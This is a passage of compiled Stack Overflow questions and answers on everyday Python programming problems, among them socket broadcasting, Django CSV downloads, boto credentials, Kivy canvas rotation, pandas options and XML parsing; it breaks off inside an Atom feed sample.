print("All the custom field data") print(zenJSONObj['custom_fields']) print("----") # Tells you all the keys in the custom_fields print("How keys and the values") for custom_field in zenJSONObj['custom_fields']: print("----") for key in custom_field.keys(): print("key:",key," value: ",custom_field[key]) You can then modify the JSON object by doing something like print(zenJSONObj['custom_fields'][0]) zenJSONObj['custom_fields'][0]['value'] = 'something new' print(zenJSONObj['custom_fields'][0]) Then re-encode it using the following: newJSONObject = json.dumps(zenJSONObj, sort_keys=True, indent=4) I hope this is of some help.
Python: How to create a directory and overwrite an existing one if necessary? Question: I want to create a new directory and remove the old one if it exists. I use the following code: if os.path.isdir(dir_name): shutil.rmtree(dir_name) os.makedirs(dir_name) It works, if the directory does not exist. It errors if the directory does exist and the program in run normally. (WindowsError: [Error 5] Access is denied: 'my_directory') However, it also works if the directory already exists and the program is executed in debug mode line by line. I guess `shutil.rmtree()` and `makedirs()` need some time in between their calls. What is the correct code so that it doesn't create an error? Answer: In Python a statement is executed just when the previous statement have finished, thats how an interpreter works. My guess is that `shutil.rmtree` tell the filesystem to delete some directory tree and in that moment Python gives terminate the work of that statement --_even if the filesystem have not deleted the complete directory tree_ \--. For that reason, if the directory tree is big enough, when Python get to the line `os.makedirs(dir_name)` the directory can still to exist. A faster operation (faster than deleting) is to rename the directory: import os import tempfile import shutil dir_name = "test" if (os.path.exists(dir_name)): # `tempfile.mktemp` Returns an absolute pathname of a file that # did not exist at the time the call is made. We pass # dir=os.path.dirname(dir_name) here to ensure we will move # to the same filesystem. Otherwise, shutil.copy2 will be used # internally and the problem remains. tmp = tempfile.mktemp(dir=os.path.dirname(dir_name)) # Rename the dir. shutil.move(dir_name, tmp) # And delete it. shutil.rmtree(tmp) # At this point, even if tmp is still being deleted, # there is no name collision. os.makedirs(dir_name)
I need the server to send messages to all clients (Python, sockets) Question: This is my server program, how can it send the data received from each client to every other client? import socket import os from threading import Thread import thread def listener(client, address): print "Accepted connection from: ", address while True: data = client.recv(1024) if not data: break else: print repr(data) client.send(data) client.close() host = socket.gethostname() port = 10016 s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((host,port)) s.listen(3) th = [] while True: print "Server is listening for connections..." client, address = s.accept() th.append(Thread(target=listener, args = (client,address)).start()) s.close() Answer: If you need to send a message to all clients, you need to keep a collection of all clients in some way. For example: clients = set() clients_lock = threading.Lock() def listener(client, address): print "Accepted connection from: ", address with clients_lock: clients.add(client) try: while True: data = client.recv(1024) if not data: break else: print repr(data) with clients_lock: for c in clients: c.sendall(data) finally: with clients_lock: clients.remove(client) client.close() It would probably be clearer to factor parts of this out into separate functions, like a `broadcast` function that did all the sends. Anyway, this is the _simplest_ way to do it, but it has problems: * If one client has a slow connection, everyone else could bog down writing to it. And while they're blocking on their turn to write, they're not reading anything, so you could overflow the buffers and start disconnecting everyone. * If one client has an error, the client whose thread is writing to that client could get the exception, meaning you'll end up disconnecting the wrong user. So, a better solution is to give each client a queue, and a writer thread servicing that queue, alongside the reader thread. (You can then extend this in all kinds of ways—put limits on the queue so that people stop trying to talk to someone who's too far behind, etc.) * * * As [Anzel](http://stackoverflow.com/users/3849456/anzel) points out, there's a _different_ way to design servers besides using a thread (or two) per client: using a [reactor](http://en.wikipedia.org/wiki/Reactor_pattern) that multiplexes all of the clients' events. Python 3.x has some great libraries for this built in, but 2.7 only has the clunky and out-of-date [`asyncore`](https://docs.python.org/2/library/asyncore.html)/[`asynchat`](https://docs.python.org/2/library/asynchat.html) and the low-level [`select`](https://docs.python.org/2/library/select.html). As Anzel says, [Python SocketServer: sending to multiple clients](http://stackoverflow.com/questions/3670127/python-socketserver- sending-to-multiple-clients) has an answer using `asyncore`, which is worth reading. But I wouldn't actually use that. If you want to write a reactor- based server in Python 2.x, I'd either use a better third-party framework like [Twisted](https://twistedmatrix.com/trac/), or find or write a very simple one that sits directly on `select`.
Django/Python: CSV for-in loop overriding first row each time through Question: class CSVDownload(View): """ Prepares CSV file version to download """ #more code here f = StringIO.StringIO() writer = csv.writer(f, dialect='excel') for v in visit_list: writer.writerow([v.idfa.idfa, v.name, v.duration, v.firstSeen, v.lastSeen, v.identifier, v.closestProximity]) f.seek(0) response = HttpResponse(f, content_type='text/csv') response['Content-Disposition'] = 'attachment; filename=AdvertiserData.csv' return response For some reason, when opening the file in excel, the file will only output the last item in the list, see ![here](http://i.stack.imgur.com/CRNYz.png) This leads me to believe that each row is overriding the first row. Although this shouldn't be the case. Look at these tests I have preformed in terminal. >>> f.getvalue() 'FFAC6F6C-1B2E-47C2-8110-5E619B239FB1,PPTest1,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR\r\nFFAC6F6C-1B2E-47C2-8110-5E619B239FB1,moo2,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR\r\n' This returns more than one value, with `\r\n` between the values. Also, I tried >>> print response Content-Type: text/csv Content-Disposition: attachment; filename=boo.csv FFAC6F6C-1B2E-47C2-8110-5E619B239FB1,PPTest1,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR FFAC6F6C-1B2E-47C2-8110-5E619B239FB1,moo2,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR And that also showed more than one value. I saw recently a SO thread here that discusses adding to a file here:[How do you append to file in python?](http://stackoverflow.com/questions/4706499/how- do-you-append-to-file-in-python) But since I am creating this item in memory only (using stringIO), how can I get the same effect? Thanks! **EDIT For extra information:** The `visit_list` is compromised of visit models: class Visit(models.Model): idfa = models.ForeignKey(Report) name = models.CharField(max_length=255) lastSeen = models.CharField(max_length=255) duration = models.CharField(max_length=255) firstSeen = models.CharField(max_length=255) identifier = models.CharField(max_length=255) closestProximity = models.CharField(max_length=255) def __unicode__(self): return self.name class Meta: verbose_name = "Visit" verbose_name_plural = "Visits" In this particular case, visit_list returns: >>> visit_list [<Visit: PPTest1>, <Visit: moo2>] Answer: **Bottom Line** : I suspect you need to pass `f.getvalue()` to `HttpResponse` rather than `f`. **The Explanation** : [`HttpResponse` prefers strings](https://docs.djangoproject.com/en/1.6/ref/request-response/#usage), although it can also be treated like a file object or accept iterators. Nevertheless, `f` is a `StringIO.StringIO` instance and not a string per se. Consider the following setup: import StringIO import csv >>> f = StringIO.StringIO() >>> writer = csv.writer(f, dialect='excel') >>> row = range(4) # first row is [0, 1, 2, 3] >>> for i in range(5): writer.writerow([row]) # write more rows row = [x + 1 for x in row] >>> f.seek(0) Now compare `f` with the result of `f.getvalue()`: # an instance >>> f <StringIO.StringIO instance at 0x03656990> # a string >>> f.getvalue() '"[0, 1, 2, 3]"\r\n"[1, 2, 3, 4]"\r\n"[2, 3, 4, 5]"\r\n"[3, 4, 5, 6]"\r\n"[4, 5, 6, 7]"\r\n' Now note the difference in your `response` object when you pass the instance versus the string to `HttpResponse`: # The instance >>> response = HttpResponse(f, content_type='text/csv') # f is an instance >>> response['Content-Disposition'] = 'attachment; filename=AdvertiserData.csv' >>> response._container [''] # The string >>> response = HttpResponse(f.getvalue(), content_type='text/csv') # f.getvalue() returns a string >>> response['Content-Disposition'] = 'attachment; filename=AdvertiserData.csv' >>> response._container ['"[0, 1, 2, 3]"\r\n"[1, 2, 3, 4]"\r\n"[2, 3, 4, 5]"\r\n"[3, 4, 5, 6]"\r\n"[4, 5 , 6, 7]"\r\n'] Note that the response's `_container` attribute is empty when you pass the instance to `HttpResponse` but **not** empty when you pass the `f.getvalue()` string to `HttpResponse`. I would try this instead, then: >>> response = HttpResponse(f.getvalue(), content_type='text/csv') >>> # etc.
How can JSON data with null value be converted to a dictionary Question: { "abc": null, "def": 9 } I have JSON data which looks like this. If not for null (without quotes as a string), I could have used `ast` module's `literal_eval` to convert the above to a dictionary. A dictionary in Python cannot have `null` as value but can have `"null"` as a value. How do I convert the above to a dictionary that Python recognizes? Answer: You should use the built-in [`json` module](https://docs.python.org/3/library/json.html), which was designed explicitly for this task: >>> import json >>> data = ''' ... { ... "abc": null, ... "def": 9 ... } ... ''' >>> json.loads(data) {'def': 9, 'abc': None} >>> type(json.loads(data)) <class 'dict'> >>> By the way, you should use this method even if your JSON data contains no `null` values. While it may work (sometimes), `ast.literal_eval` was designed to evaluate _Python_ code that is represented as a string. It is simply the wrong tool to work with JSON data.
Run python script from enthought canopy with an absolute path as an argument Question: I would like to run a python script from enthought canopy v1.5.0.2717, either in mac or windows, and provide a absolute file path as an argument using the run configuration dialog. In the run configuration I put an argument (for example): '/Users/dir/Data/University stuff/CQT/Data/ScriptRunFolder/testingPythonRfRamp.xml' The my script contains the following code: import sys print sys.argv[1] I then click "run" and the printed string is: '/Users/dir/Data/University' Another example is using the path: 'C:\User\Program files\test.txt' and it prints 'C:UserProgram' It looks like it splits the path at the spaces, and deletes the "\". Running the script from the command line like: $python myScript.py '/Users/dir/Data/University stuff/CQT/Data/ScriptRunFolder/testingPythonRfRamp.xml' Results in the correct printed string: '/Users/dir/Data/University stuff/CQT/Data/ScriptRunFolder/testingPythonRfRamp.xml' How can I achieve the same result using Canopy? Answer: The shell will group everything within double-quotes into a single parameter, not single quotes. >type showme.py import sys print(sys.argv[1:]) >python showme.py 'i am sad' ["'i", 'am', "sad'"] >python showme.py "i am happy" ['i am happy']
Compiling Qt statically on Windows XP and MinGW fail. Is it possible to achieve? Question: I need to compile Qt statically. I have to do it on a virtual machine running Windows XP. Because of this requirement, I can't use the PowerShell 3.0 script suggested in the wiki page [How to build a static Qt for Windows/MinGW](http://qt-project.org/wiki/How-to-build-a-static-Qt-for- Windows-MinGW) (PowerShell 3.0 can't be installed on WinXP). I tried to read the script and do its work step by step manually. I added to the end of `C:\Qt\5.3\Src\qtbase\mkspecs\win32-g++\qmake.conf` file: # [QT-STATIC-PATCH] QMAKE_LFLAGS += -static -static-libgcc QMAKE_CFLAGS_RELEASE -= -O2 QMAKE_CFLAGS_RELEASE += -Os -momit-leaf-frame-pointer DEFINES += QT_STATIC_BUILD I ran the configuration: mkdir C:\Qt\5.3\Static-build cd C:\Qt\5.3\Static-build ..\Src\configure.bat -static -debug-and-release -platform win32-g++ \ -prefix C:\Qt\5.3\Static -qt-zlib -qt-pcre -qt-libpng -qt-libjpeg \ -qt-freetype -opengl desktop -qt-sql-sqlite -no-openssl -opensource \ -confirm-license -make libs -nomake tools -nomake examples -nomake tests and that seems OK: This is the Qt for Windows Open Source Edition. You have already accepted the terms of the license. Creating qmake... mingw32-make: Nothing to be done for 'first'. Running configuration tests... Environment: INCLUDE= Unset LIB= Unset PATH= C:\Qt\5.3\mingw482_32\bin C:\Qt\Tools\mingw482_32\bin C:\Program Files\Git\git-cheetah\..\bin C:\Program Files\Git\git-cheetah\..\bin C:\Program Files\Git\git-cheetah\..\bin C:\Program Files\Git\git-cheetah\..\bin C:\Program Files\Git\git-cheetah\..\bin C:\Program Files\Git\git-cheetah\..\bin C:\Program Files\Git\git-cheetah\..\bin C:\WINDOWS\system32 C:\WINDOWS C:\WINDOWS\System32\Wbem C:\Program Files\Git\cmd C:\Program Files\TortoiseGit\bin C:\Program Files\CMake\bin C:\Python27 C:\StrawberryPerl\perl\bin C:\StrawberryPerl\win32 C:\WINDOWS\system32\WindowsPowerShell\v1.0 Configuration: pcre debug compile_examples Qt Configuration: minimal-config small-config medium-config large-config full-config debug_and_release build_all release debug c++11 static zlib gif jpeg png freetype build_all accessibility opengl audio-backend native-gestures qpa iconv concurrent QMAKESPEC...................win32-g++ (commandline) Architecture................i386, features: Host Architecture...........i386, features: Maketool....................mingw32-make Debug build.................yes (combined) Default build...............debug Force debug info............no C++11 support...............yes Link Time Code Generation...no Accessibility support.......yes RTTI support................yes SSE2 support................yes SSE3 support................yes SSSE3 support...............yes SSE4.1 support..............yes SSE4.2 support..............yes AVX support.................yes AVX2 support................yes NEON support................no IWMMXT support..............no OpenGL support..............yes Large File support..........yes NIS support.................no Iconv support...............yes Evdev support...............no Mtdev support...............no Inotify support.............no eventfd(7) support..........no Glib support................no CUPS support................no OpenVG support..............no OpenSSL support.............no Qt D-Bus support............no Qt Widgets module support...yes Qt GUI module support.......yes QML debugging...............yes DirectWrite support.........no Use system proxies..........no QPA Backends: GDI.....................yes Direct2D................no Third Party Libraries: ZLIB support............qt GIF support.............yes JPEG support............yes PNG support.............yes FreeType support........yes Fontconfig support......no HarfBuzz-NG support.....no PCRE support............qt ICU support.............no ANGLE...................no Dynamic OpenGL..........no Styles: Windows.................yes Windows XP..............yes Windows Vista...........yes Fusion..................yes Windows CE..............no Windows Mobile..........no Sql Drivers: ODBC....................no MySQL...................no OCI.....................no PostgreSQL..............no TDS.....................no DB2.....................no SQLite..................yes (qt) SQLite2.................no InterBase...............no Sources are in..............C:\Qt\5.3\Src\qtbase Build is done in............C:\Qt\5.3\Static-build\qtbase Install prefix..............C:\Qt\5.3\Static Headers installed to........C:\Qt\5.3\Static\include Libraries installed to......C:\Qt\5.3\Static\lib Arch-dep. data to...........C:\Qt\5.3\Static Plugins installed to........C:\Qt\5.3\Static\plugins Library execs installed to..C:\Qt\5.3\Static\bin QML1 imports installed to...C:\Qt\5.3\Static\imports QML2 imports installed to...C:\Qt\5.3\Static\qml Binaries installed to.......C:\Qt\5.3\Static\bin Arch-indep. data to.........C:\Qt\5.3\Static Docs installed to...........C:\Qt\5.3\Static\doc Translations installed to...C:\Qt\5.3\Static\translations Examples installed to.......C:\Qt\5.3\Static\examples Tests installed to..........C:\Qt\5.3\Static\tests WARNING: Using static linking will disable the use of plugins. Make sure you compile ALL needed modules into the library. Generating Makefiles... Qt is now configured for building. Just run mingw32-make. To reconfigure, run mingw32-make confclean and configure. But the compilation with mingw32-make failed at some point: cd qml/ && ( test -e Makefile || c:/Qt/5.3/Static-build/qtbase/bin/qmake.exe C:/Qt/5.3/Src/qtdeclarative/tools/qml/qml.pro -o Makefile ) && c:/Qt/Tools/mingw482_32/bin/mingw32-make -f Makefile 'QT_PLUGIN_PATH' n'est pas reconnu en tant que commande interne ou externe, un programme exécutable ou un fichier de commandes. Project ERROR: Failed to parse qmlimportscanner output. Makefile:94: recipe for target 'sub-qml-make_first' failed mingw32-make[2]: *** [sub-qml-make_first] Error 3 mingw32-make[2]: Leaving directory 'c:/Qt/5.3/Static-build/qtdeclarative/tools' Makefile:66: recipe for target 'sub-tools-make_first' failed mingw32-make[1]: *** [sub-tools-make_first] Error 2 mingw32-make[1]: Leaving directory 'c:/Qt/5.3/Static-build/qtdeclarative' Makefile:101: recipe for target 'module-qtdeclarative-make_first' failed mingw32-make: *** [module-qtdeclarative-make_first] Error 2 Sorry for the french wording. The interesting point is: > 'QT_PLUGIN_PATH' is not recognized as internal or external command, an > executable program or a command file I found other people having the same issue ([here](http://qt- project.org/forums/viewthread/38552)) and tried the solution they suggested (from [here](https://github.com/Alexpux/MINGW- packages/blob/master/mingw-w64-qt5/qt-5.3.0-static-qmake-conf.patch)): I added QMAKE_LFLAGS_STATIC_LIB += -static to qtbase/mkspecs/win32-g++/qmake.conf and added static:win32: QMAKE_LFLAGS += $$QMAKE_LFLAGS_STATIC_LIB to qtbase/mkspecs/features/default_post.prf I still have the error. So I have 2 questions: 1. **Do you know if it is possible to compile Qt 5.3 on Windows XP with MinGW?** 2. **Does someone know how to fix the error`'QT_PLUGIN_PATH' is not recognized [...]`?** Answer: Ok, for a weird reason, after closing my console, re-opening it and re-trying, it worked :/ I leave this question open in case that someone have a better explanation for "'QT_PLUGIN_PATH' is not recognized [...]" error. Apparently I was not the first to get stuck on this error.
How to clean images in Python / Django? Question: I'm asking this question, because I can't solve one problem in `Python/Django` (actually in pure Python it's ok) which leads to `RuntimeError: tcl_asyncdelete async handler deleted by the wrong thread`. This is somehow related to the way how I render `matplotlib` plots in Django. The way I do it is: ... import matplotlib.pyplot as plt ... fig = plt.figure() ... plt.close() I extremely minimized my code. But the catch is - even if I have just one line of code: fig = plt.figure() I see this RuntimeError happening. I hope I coud solve the problem, If I knew the correct way of closing/cleaning/destroying plots in Python/Django. Answer: By default matplotlib uses TK gui toolkit, when you're rendering an image without using the toolkit (i.e. into a file or a string), matplotlib still instantiates a window that doesn't get displayed, causing all kinds of problems. In order to avoid that, you should use an Agg backend. It can be activated like so -- import matplotlib matplotlib.use('Agg') from matplotlib import pyplot For more information please refer to matplotlib documentation -- <http://matplotlib.org/faq/howto_faq.html#matplotlib-in-a-web-application- server>
why boto not find config the file (Credentials) Question: i Created new config file: $ sudo vi ~/.boto there i paste my credentials (as written in readthedocs for botp): [Credentials] aws_access_key_id = YOURACCESSKEY aws_secret_access_key = YOURSECRETKEY im trying to check connection: import boto boto.set_stream_logger('boto') s3 = boto.connect_s3("us-east-1") and my answer: 2014-11-26 14:05:49,532 boto [DEBUG]:Using access key provided by client. 2014-11-26 14:05:49,532 boto [DEBUG]:Retrieving credentials from metadata server. 2014-11-26 14:05:50,539 boto [ERROR]:Caught exception reading instance data Traceback (most recent call last): File "/Library/Python/2.7/site-packages/boto/utils.py", line 210, in retry_url r = opener.open(req, timeout=timeout) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 404, in open response = self._open(req, data) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 422, in _open '_open', req) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 382, in _call_chain result = func(*args) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 1214, in http_open return self.do_open(httplib.HTTPConnection, req) File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 1184, in do_open raise URLError(err) URLError: <urlopen error timed out> 2014-11-26 14:05:50,540 boto [ERROR]:Unable to read instance data, giving up Traceback (most recent call last): File "/Users/user/PycharmProjects/project/untitled.py", line 8, in <module> s3 = boto.connect_s3("us-east-1") File "/Library/Python/2.7/site-packages/boto/__init__.py", line 141, in connect_s3 return S3Connection(aws_access_key_id, aws_secret_access_key, **kwargs) File "/Library/Python/2.7/site-packages/boto/s3/connection.py", line 190, in __init__ validate_certs=validate_certs, profile_name=profile_name) File "/Library/Python/2.7/site-packages/boto/connection.py", line 569, in __init__ host, config, self.provider, self._required_auth_capability()) File "/Library/Python/2.7/site-packages/boto/auth.py", line 975, in get_auth_handler 'Check your credentials' % (len(names), str(names))) boto.exception.NoAuthHandlerFound: No handler was ready to authenticate. 1 handlers were checked. ['HmacAuthV1Handler'] Check your credentials why its not found the Credentials? there is something that i did wrong? Answer: It is saying: **Check your credentials** You specified incorrect credentials, there is nothing with your config file syntax. I have no issues when I specify the correct credentials in the config file. >>> import boto >>> s3 = boto.connect_s3("us-west-1") >>> s3 S3Connection:s3.amazonaws.com
Parse XML in Python with lxml.etree Question: How can I parse this site (<http://www.tvspielfilm.de/tv- programm/rss/heute2015.xml>) with python to get for example the tv programm for today on SAT at 20:15? I've tried the Python library lxml.etree, but I failed: #!/usr/bin/python import lxml.etree as ET import urllib2 response = urllib2.urlopen('http://www.tvspielfilm.de/tv-programm/rss/heute2015.xml') xml = response.read() root = ET.fromstring(xml) for item in root.findall('SAT'): title = item.find('title').text print title Answer: The method `Element.findall` uses xpath expression as an argument. `'SAT'` finds only direct children that are named SAT of the root node, witch is `'rss'`. If you need to find a tag anyway in the document use `'.//SAT'`. The expression `'.//items'` is what you looking for: #!/usr/bin/python import lxml.etree as ET import urllib2 response = urllib2.urlopen('some/url/to.xml') xml = response.read() root = ET.fromstring(xml) for item in root.findall('.//item'): title = item.find('title').text print title
How can i move files from one directory to another? Question: I am beginner in python . I want to move some files from one directory to another. I just now i have to use some modules like Os and Shutil. and i write this code but it return an error: import shutil import os source = os.listdir("/tmp/") destination = "/tmp/newfolder/" for files in source: if files.endswith(".txt"): shutil.move(files,destination) please help me Answer: This is kind of a wild guess, but I'm pretty sure that this is your problem, so I'll give it a try. Note that `os.listdir` returns a list of filenames only; it does not include the directory that was the parameter to `os.listdir`. I.e., you have to tell `shutils.move` where to find those files! Also, you might have to create the destination directory, if it does not yet exist. Try this: import shutil, os source = "/tmp/" destination = "/tmp/newfolder/" if not os.path.exists(destination): os.makedirs(destination) # only if it does not yet exist for f in os.listdir(source): if f.endswith(".txt"): shutil.move(source + f, destination) # add source dir to filename
Regex not matching \t\n\r\f\v in Python Question: I have a list of a strings: content = ['***************************************\n\t', 'ADVENTURE', '*', 'Solving', 'it', 'in', 'easy', 'steps', '*\n\t', '*\t\t\t\t', '*\n\t', '*\t\t\t\t', '*\n\t', '***************************************\n\t\t', 'FROM:', 'THE', 'ROM', 'DR.', 'CALL', 'HER'] In which I'm trying to remove anything that ends with a non-alphanumeric character like \t \n \v and so on. I have the following code: import re for each in content: m = re.match('.*[\t\n\r\f\v]+',each) if m: content.remove(each) But the output is still giving me strings with \n or \t. Any ideas? Answer: You dont need `regex` , use `str.strip()` and `set` (**if you have not duplicated elements in your list (or you dont want duplicates) because`set` remove duplicates** ), first you `strip` all the element of `content` list (removing whitspaces at leading and trailing of the string ) and then use a logic and `&` that works between tow `set` between new striped list and first list to chose elements that are in both (elements that `strip()` function doesn't change them so those are in both list) : >>> new=[i.strip() for i in content] >>> set(content) & set(new) set(['*', 'in', 'ROM', 'HER', 'Solving', 'it', 'CALL', 'ADVENTURE', 'easy', 'DR.', 'steps', 'THE', 'FROM:'])
Behaviour of rotating image between kivy and python Question: I'm having problem understanding what kivy is doing behind the scenes when using the kivy language when rotating images and moving them. Below is a code that's is supposed to draw two images in a 45 degree angle on the screen and then for every mouse click rotate it more and then move it to the right on the screen. First image is drawn by using the rotate defined in the kivy language where the second is where I try to redo it in only python (to understand better what kivy is actually doing), but I'm failing since the python version firstly does not move the image to the right when I increase x, but looks like the whole coordinate system has been rotated for that image since it moves in 45 degree angle up the screen, and secondly it does not rotate that image when I click. Is anybody that can tell me what I am missing, what would be needed to do in python (without using the kivy language) to acquire the same behaviour as the first image is using? thanks in advance! Dan from kivy.app import App from kivy.lang import Builder from kivy.uix.image import Image from kivy.graphics import Rotate from kivy.uix.widget import Widget from kivy.properties import NumericProperty from kivy.graphics.context_instructions import PopMatrix, PushMatrix Builder.load_string(''' <TestKV>: canvas.before: PushMatrix Rotate: angle: self.angle axis: (0, 0, 1) origin: self.center canvas.after: PopMatrix ''') class TestKV(Image): angle = NumericProperty(0) def __init__(self, x, **kwargs): super(TestKV, self).__init__(**kwargs) self.x = x self.angle = 45 def on_touch_down(self, touch): self.angle += 20 self.x += 10 class TestPY(Image): angle = NumericProperty(0) def __init__(self, x, **kwargs): super(TestPY, self).__init__(**kwargs) self.x = x with self.canvas.before: PushMatrix() rot = Rotate() rot.angle = 45 rot.origin = self.center rot.axis = (0, 0, 1) with self.canvas.after: PopMatrix() def on_touch_down(self, touch): self.angle += 20 self.x += 10 class MainWidget(Widget): #this is the main widget that contains the game. def __init__(self, **kwargs): super(MainWidget, self).__init__(**kwargs) self.all_sprites = [] self.k = TestKV(source="myTestImage.bmp", x=10) self.add_widget(self.k) self.p = TestPY(source="myTestImage.bmp", x=200) self.add_widget(self.p) class TheApp(App): def build(self): parent = Widget() app = MainWidget() parent.add_widget(app) return parent if __name__ == '__main__': TheApp().run() Answer: You never change the angle of the `Rotate` instruction. You have an `angle` property on your widget, but that isn't linked to anything. Try updating the `Rotate` instruction instead: class TestPY(Image): def __init__(self, **kwargs): super(TestPY, self).__init__(**kwargs) # self.x = x -- not necessary, x is a property and will be handled by super() with self.canvas.before: PushMatrix() self.rot = Rotate() self.rot.angle = 45 self.rot.origin = self.center self.rot.axis = (0, 0, 1) with self.canvas.after: PopMatrix() def on_touch_down(self, touch): self.x += 10 self.rot.origin = self.center # center has changed; update here or bind instead self.rot.angle += 20
create android project and android-support-v7-appcompat is not included in lib(eclipse) Question: I fixed the problem. I used the workspace which was given by a python professor. I guess some sets do not match. After changing workspace, it works. Thank all you guys answer. When i create a new android project, i ask eclipse create the activity for me. the code need to be imported v7, but there is not v7 in the lib. The error message shows up and stop the creating process. Anyone know how to fix it?(And i want to fix it in one time. i dont want it show up every time i create new project)(also if i cant fix it, eclipse cannot finish creating process,it means there are some unknown file have not be created before the error.this is the biggest problem) [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'. [2014-11-26 23:39:54 - s] [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v11\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'. [2014-11-26 23:39:54 - s] [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v14\styles.xml:8: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light.DarkActionBar'. [2014-11-26 23:39:54 - s] [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'. [2014-11-26 23:39:54 - s] [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v11\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'. [2014-11-26 23:39:54 - s] [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v14\styles.xml:8: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light.DarkActionBar'. [2014-11-26 23:39:54 - s] Answer: This is because you need to reference support v7 in your project.missing library. So you can solve this problem by following steps 1. File->Import (android-sdk\extras\android\support\v7). Choose "appcompat" 2. Project-> properties->Android. In the section library "Add" and choose "appCompat" That's it. I hope this answer is helpful to you friend :)
ipython notebook pandas max allowable columns Question: I have a simple csv file with ten columns! When I set the following option in the notebook and print my csv file (which is in a pandas dataframe) it doesn't print all the columns from left to right, it prints the first two, the next two underneath and so on. I used this option, why isn't it working? pd.option_context("display.max_rows",1,"display.max_columns",100) Even this doesn't seem to work: pandas.set_option('display.max_columns', None) Answer: I assume you want to display your data in the notebook than the following options work fine for me (IPython 2.3): import pandas as pd from IPython.display import display data = pd.read_csv('yourdata.txt') Either directly set the option pd.options.display.max_columns = None display(data) Or, use the set_option method you showed actually works fine as well pd.set_option('display.max_columns', None) display(data) If you don't want to set this options for the whole script use the context manager with pd.option_context('display.max_columns', None): display(data) If this doesn't help, you might give a minimal example to reproduce your issue.
Merging Pandas DataFrames on categorical series Question: I'm trying to understand if pandas supports merging DataFrames on columns of categorical data (i.e. dtype="category"). I do most of my data work in R, but am trying to do more work in Python/pandas. In R, merging on factors (analogous to the categorical dtype) induces type coercion, typically to character. This allows one data frame to have a by-variable (join column) specified as a factor (categorical) and the other to have its by-variable be a string. Does pandas perform similar coercion of categorical data to string prior to merging/joining? Should I expect merging on categoricals to be robust? Where can I find documentation on (automatic) type coercion in pandas? Simple example: +++ It is an error to test a categorical vector for equality against a non- categorical/non-scalar vector: In [52]: import pandas as pd a = pd.Series(['a','b','c'],dtype="category") b = pd.Series(['a','b','c'],dtype="object") c = pd.Series(['a','b','cc'],dtype="object") In [54]: a==b --------------------------------------------------------------------------- TypeError Traceback (most recent call last) ... TypeError: Cannot compare a Categorical for op <built-in function eq> with type <class 'numpy.ndarray'>. If you want to compare values, use 'series <op> np.asarray(cat)'. +++ But merging a DataFrame on columns of different type--one categorical, one string--does not throw an error (at least in this simple case). Some type of coercion must occur: In [59]: A = pd.DataFrame({'A':a,'B':[1,2,3]}) B = pd.DataFrame({'A':b,'C':[4,5,6]}) print(A.merge(B,on='A')) A B C 0 a 1 4 1 b 2 5 2 c 3 6 Answer: So in short, in 0.15.1 the merging behavior was changed (fixed really) to allow merging of Categoricals that had exactly the same categories. Further if an object array was merged in it is allowed, but the resulting character of the returned merge would now be object (IIRC). I don't recall if we try to infer it back to a Categorical or not. I created an issue [here](https://github.com/pydata/pandas/issues/8938) for discussion on this. The equality shown above, e.g. not allowing comparisons of Categoricals vs object dtypes was done first, while the merging behavior was recently expanded to allow the merging of like-Categoricals and objects dtypes (assuming all merged Categoricals share the same categories). So I think allowing the equality to work is just the API not catching up. We will address this in 0.16.0, but pls provide comments on the issue. PR for this is [here](https://github.com/pydata/pandas/pull/8946) This will be in the upcoming 0.15.2 release (slated for week of December 7, 2014)
issues with python xml parsing Question: I'm new to xml and REST but have some basic knowledge with python. I'm facing some issues while trying to parse the attached xml file. I use Beautifulsoup library to parse the file and, for an unknown reason, I can access different fields of entries 2 and 3 but not entry 1, while they are all formatted the same way. Can someone tell what I'm doing wrong with my (attached) code and output please? <?xml version='1.0' encoding='UTF-8'?> <feed xmlns="http://www.w3.org/2005/Atom"> <title type="text">News</title> <id>1</id> <link href="" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/entries" rel="self" /> <updated>2014-11-26T10:41:12.424Z</updated> <author /> <entry xmlns:georss="http://www.georss.org/georss"> <title type="html">TEST REST</title> <content type="html">1</content> <author> <name>User213</name> </author> <summary type="html">Test PUT Entry 3</summary> <id>7</id> <georss:point>21.94420760726878 17.44</georss:point> <updated>2014-11-24T09:55:31.000Z</updated> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/7" rel="self" type="application/atom+xml" length="0" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/7/editEntry" rel="edit" type="application/atom+xml" length="0" /> <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/7/comments" rel="replies" type="application/atom+xml" length="0" /> </entry> <entry xmlns:georss="http://www.georss.org/georss"> <title type="html">TEST REST</title> <content type="html">1</content> <author> <name>User213</name> </author> <summary type="html">Test PUT Entry 8</summary> 